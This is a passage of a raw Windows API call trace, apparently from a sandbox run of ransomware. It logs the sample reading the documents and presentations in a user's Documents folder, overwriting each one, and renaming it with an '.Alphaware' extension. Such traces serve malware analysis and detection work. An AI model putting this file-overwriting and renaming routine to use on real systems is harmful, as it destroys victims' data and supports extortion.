hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.393] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.393] WriteFile (in: hFile=0x254, lpBuffer=0x24a4d40*, nNumberOfBytesToWrite=0x574, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24a4d40*, lpNumberOfBytesWritten=0x23e9f8*=0x574, lpOverlapped=0x0) returned 1 [0082.393] CloseHandle (hObject=0x254) returned 1 [0082.423] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx", lpFilePart=0x0) returned 0x27 [0082.423] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx.Alphaware", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx.Alphaware", lpFilePart=0x0) returned 0x31 [0082.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.424] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ac gz.docx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac1bd690, ftCreationTime.dwHighDateTime=0x1d8edc7, ftLastAccessTime.dwLowDateTime=0xd4054800, ftLastAccessTime.dwHighDateTime=0x1d8f559, ftLastWriteTime.dwLowDateTime=0x834efea0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x15574)) returned 1 [0082.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.424] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\ac gz.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\ac gZ.docx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\ac gz.docx.alphaware")) returned 1 [0082.427] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Daw-ipdR7oVXj2G.docx", dwFileAttributes=0x80) returned 1 [0082.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.427] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Daw-ipdR7oVXj2G.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\daw-ipdr7ovxj2g.docx"), fInfoLevelId=0x0, lpFileInformation=0x24a8590 | out: lpFileInformation=0x24a8590*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x68a0c280, ftCreationTime.dwHighDateTime=0x1d93459, ftLastAccessTime.dwLowDateTime=0x62984420, ftLastAccessTime.dwHighDateTime=0x1d9621d, ftLastWriteTime.dwLowDateTime=0x62984420, ftLastWriteTime.dwHighDateTime=0x1d9621d, nFileSizeHigh=0x0, nFileSizeLow=0xf0f8)) returned 1 [0082.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.428] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Daw-ipdR7oVXj2G.docx", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Daw-ipdR7oVXj2G.docx", lpFilePart=0x0) returned 0x31 [0082.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.428] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Daw-ipdR7oVXj2G.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\daw-ipdr7ovxj2g.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.428] GetFileType (hFile=0x254) returned 0x1 [0082.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.428] GetFileType (hFile=0x254) returned 0x1 [0082.428] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xf0f8 [0082.429] ReadFile (in: hFile=0x254, lpBuffer=0x24a8808, nNumberOfBytesToRead=0xf0f8, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24a8808*, lpNumberOfBytesRead=0x23eb38*=0xf0f8, lpOverlapped=0x0) returned 1 [0082.430] CloseHandle (hObject=0x254) returned 1 [0082.472] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.472] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Daw-ipdR7oVXj2G.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\daw-ipdr7ovxj2g.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.474] GetFileType (hFile=0x254) returned 0x1 [0082.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.474] GetFileType (hFile=0x254) returned 0x1 [0082.474] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.476] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.476] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.476] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.477] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.477] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.477] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.478] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.478] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.478] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.478] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.479] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.479] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.479] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.480] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.480] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.480] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.481] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.481] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.481] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea18, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23ea18*=0x1000, lpOverlapped=0x0) returned 1 [0082.482] WriteFile (in: hFile=0x254, lpBuffer=0x2560c98*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2560c98*, lpNumberOfBytesWritten=0x23e9f8*=0x220, lpOverlapped=0x0) returned 1 [0082.482] CloseHandle (hObject=0x254) returned 1 [0082.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.484] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Daw-ipdR7oVXj2G.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\daw-ipdr7ovxj2g.docx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68a0c280, ftCreationTime.dwHighDateTime=0x1d93459, ftLastAccessTime.dwLowDateTime=0x62984420, ftLastAccessTime.dwHighDateTime=0x1d9621d, ftLastWriteTime.dwLowDateTime=0x835d46e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14220)) returned 1 [0082.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.484] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Daw-ipdR7oVXj2G.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\daw-ipdr7ovxj2g.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Daw-ipdR7oVXj2G.docx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\daw-ipdr7ovxj2g.docx.alphaware")) returned 1 [0082.486] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini", dwFileAttributes=0x80) returned 1 [0082.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.486] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2562ea8 | out: lpFileInformation=0x2562ea8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8588a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192)) returned 1 [0082.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.486] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini", lpFilePart=0x0) returned 0x28 [0082.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.487] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.487] GetFileType (hFile=0x254) returned 0x1 [0082.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.487] GetFileType (hFile=0x254) returned 0x1 [0082.487] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x192 [0082.487] ReadFile (in: hFile=0x254, lpBuffer=0x2563268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2563268*, lpNumberOfBytesRead=0x23eb38*=0x192, lpOverlapped=0x0) returned 1 [0082.488] CloseHandle (hObject=0x254) returned 1 [0082.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.517] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\documents\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.518] GetFileType (hFile=0x254) returned 0x1 [0082.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.518] GetFileType (hFile=0x254) returned 0x1 [0082.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x836209a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4)) returned 1 [0082.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.520] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\documents\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\desktop.ini.alphaware")) returned 1 [0082.521] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\dNMC XdC2fS1.pptx", dwFileAttributes=0x80) returned 1 [0082.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\dNMC XdC2fS1.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\dnmc xdc2fs1.pptx"), fInfoLevelId=0x0, lpFileInformation=0x25e4e40 | out: lpFileInformation=0x25e4e40*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe5b92770, ftCreationTime.dwHighDateTime=0x1d9437d, ftLastAccessTime.dwLowDateTime=0xf4886af0, ftLastAccessTime.dwHighDateTime=0x1d975bd, ftLastWriteTime.dwLowDateTime=0xf4886af0, ftLastWriteTime.dwHighDateTime=0x1d975bd, nFileSizeHigh=0x0, nFileSizeLow=0xfd74)) returned 1 [0082.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.522] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\dNMC XdC2fS1.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\dnmc xdc2fs1.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.522] GetFileType (hFile=0x254) returned 0x1 [0082.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.523] GetFileType (hFile=0x254) returned 0x1 [0082.523] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xfd74 [0082.524] ReadFile (in: hFile=0x254, lpBuffer=0x25e5098, nNumberOfBytesToRead=0xfd74, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x25e5098*, lpNumberOfBytesRead=0x23eb38*=0xfd74, lpOverlapped=0x0) returned 1 [0082.526] CloseHandle (hObject=0x254) returned 1 [0082.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.598] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\dNMC XdC2fS1.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\dnmc xdc2fs1.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.600] GetFileType (hFile=0x254) returned 0x1 [0082.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.600] GetFileType (hFile=0x254) returned 0x1 [0082.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.604] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\dNMC XdC2fS1.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\dnmc xdc2fs1.pptx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5b92770, ftCreationTime.dwHighDateTime=0x1d9437d, ftLastAccessTime.dwLowDateTime=0xf4886af0, ftLastAccessTime.dwHighDateTime=0x1d975bd, ftLastWriteTime.dwLowDateTime=0x836df080, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x152c8)) returned 1 [0082.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.605] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\dNMC XdC2fS1.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\dnmc xdc2fs1.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\dNMC XdC2fS1.pptx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\dnmc xdc2fs1.pptx.alphaware")) returned 1 [0082.606] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\DZ5O.docx", dwFileAttributes=0x80) returned 1 [0082.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.606] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\DZ5O.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dz5o.docx"), fInfoLevelId=0x0, lpFileInformation=0x23fd098 | out: lpFileInformation=0x23fd098*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x58a94d90, ftCreationTime.dwHighDateTime=0x1d967f1, ftLastAccessTime.dwLowDateTime=0xc7558580, ftLastAccessTime.dwHighDateTime=0x1d96993, ftLastWriteTime.dwLowDateTime=0xc7558580, ftLastWriteTime.dwHighDateTime=0x1d96993, nFileSizeHigh=0x0, nFileSizeLow=0xaf69)) returned 1 [0082.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.607] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\DZ5O.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dz5o.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.607] GetFileType (hFile=0x254) returned 0x1 [0082.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.607] GetFileType (hFile=0x254) returned 0x1 [0082.607] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xaf69 [0082.608] ReadFile (in: hFile=0x254, lpBuffer=0x23fd2b0, nNumberOfBytesToRead=0xaf69, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23fd2b0*, lpNumberOfBytesRead=0x23eb38*=0xaf69, lpOverlapped=0x0) returned 1 [0082.610] CloseHandle (hObject=0x254) returned 1 [0082.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.677] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\DZ5O.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dz5o.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.679] GetFileType (hFile=0x254) returned 0x1 [0082.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.679] GetFileType (hFile=0x254) returned 0x1 [0082.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.684] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\DZ5O.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dz5o.docx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a94d90, ftCreationTime.dwHighDateTime=0x1d967f1, ftLastAccessTime.dwLowDateTime=0xc7558580, ftLastAccessTime.dwHighDateTime=0x1d96993, ftLastWriteTime.dwLowDateTime=0x8379d760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xeab4)) returned 1 [0082.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.685] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\DZ5O.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dz5o.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\DZ5O.docx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\dz5o.docx.alphaware")) returned 1 [0082.686] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\D_cm4s7fP.pptx", dwFileAttributes=0x80) returned 1 [0082.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\D_cm4s7fP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\d_cm4s7fp.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2460260 | out: lpFileInformation=0x2460260*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x3e51dc40, ftCreationTime.dwHighDateTime=0x1d969f0, ftLastAccessTime.dwLowDateTime=0x15d1dce0, ftLastAccessTime.dwHighDateTime=0x1d97385, ftLastWriteTime.dwLowDateTime=0x15d1dce0, ftLastWriteTime.dwHighDateTime=0x1d97385, nFileSizeHigh=0x0, nFileSizeLow=0x78db)) returned 1 [0082.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.688] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\D_cm4s7fP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\d_cm4s7fp.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.688] GetFileType (hFile=0x254) returned 0x1 [0082.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.688] GetFileType (hFile=0x254) returned 0x1 [0082.688] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x78db [0082.689] ReadFile (in: hFile=0x254, lpBuffer=0x2460498, nNumberOfBytesToRead=0x78db, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2460498*, lpNumberOfBytesRead=0x23eb38*=0x78db, lpOverlapped=0x0) returned 1 [0082.690] CloseHandle (hObject=0x254) returned 1 [0082.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.727] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\D_cm4s7fP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\d_cm4s7fp.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.729] GetFileType (hFile=0x254) returned 0x1 [0082.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.729] GetFileType (hFile=0x254) returned 0x1 [0082.732] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.732] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\D_cm4s7fP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\d_cm4s7fp.pptx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e51dc40, ftCreationTime.dwHighDateTime=0x1d969f0, ftLastAccessTime.dwLowDateTime=0x15d1dce0, 